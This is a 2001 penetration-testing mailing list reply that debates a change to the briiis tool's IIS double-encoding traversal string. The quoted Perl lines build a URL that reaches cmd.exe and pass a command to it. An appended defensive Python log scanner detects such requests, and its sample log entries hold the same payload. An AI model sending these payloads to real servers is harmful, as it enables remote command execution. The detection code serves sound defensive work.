Penetration Testing mailing list archives

Re: iXsecurity.tool.briiis.3.02


From: Sigtrap <sigtrap () mail bip net>
Date: Wed, 13 Jun 2001 15:33:27 -0700

Nicolas Gregoire writes:
Here are the modifications I did to your toy :
OLD LINE :
$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..${opt_F}winnt/system32/cmd.exe?/c+$opt_c"
if ($opt_c);
NEW LINE :
$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"
if ($opt_c);

Has Nicolas tested his change before mailing pen-test?
If you change Ian Vitek's briiis with the NEW LINE, the double encoding vulnerability testing (%255c)
will fail due to the last '../'.

Briiis is not a toy, it is a weapon. Use it to defend yourself, not to attack. ;-)
//Sigtrap
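
For defenders reading this thread, an added example (not part of the original post and not code from briiis): a log check that percent-decodes each request path layer by layer and reports the first layer at which a `..\` or `../` sequence becomes visible. The log lines are constructed and assume `$opt_F` was set to `%255c` or `%5c`; the function names and `MAX_LAYERS` are illustrative.

```python
import re
from urllib.parse import unquote

MAX_LAYERS = 4                        # assumption: cap on nested encodings unwrapped
TRAVERSAL = re.compile(r"\.\.[\\/]")  # ".." followed by either path separator


def first_traversal_layer(request_target):
    """Return how many percent-decoding passes expose a traversal sequence.

    0 means it is visible in the raw path, 1 after one decode, 2 after two
    (the %255c case), and None if no layer up to MAX_LAYERS shows one.
    """
    path = request_target.split("?", 1)[0]   # only the path part is inspected
    for layer in range(MAX_LAYERS + 1):
        if TRAVERSAL.search(path):
            return layer
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:                  # nothing left to decode
            return None
        path = decoded
    return None


def scan(log_lines):
    """Yield (layer, target) for each logged request whose path contains traversal."""
    for line in log_lines:
        m = re.search(r'"[A-Z]+ (\S+) HTTP/', line)
        if m:
            layer = first_traversal_layer(m.group(1))
            if layer is not None:
                yield layer, m.group(1)


# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = [
    '192.0.2.10 - - [t] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.10 - - [t] "GET /..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0',
    '192.0.2.10 - - [t] "GET /..%5c..%5cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0',
    '192.0.2.10 - - [t] "GET /..%255c..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0',
    '192.0.2.10 - - [t] "GET /docs/100%25.html HTTP/1.0" 200 90',
]

if __name__ == "__main__":
    for layer, target in scan(SAMPLE_LOG):
        print(f"layer {layer}: {target}")
```

A request shaped like the OLD LINE only shows traversal at layer 2, while one shaped like the NEW LINE is flagged at layer 0 because of its literal `../`, so a raw-string match alone would miss the fully double-encoded form.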


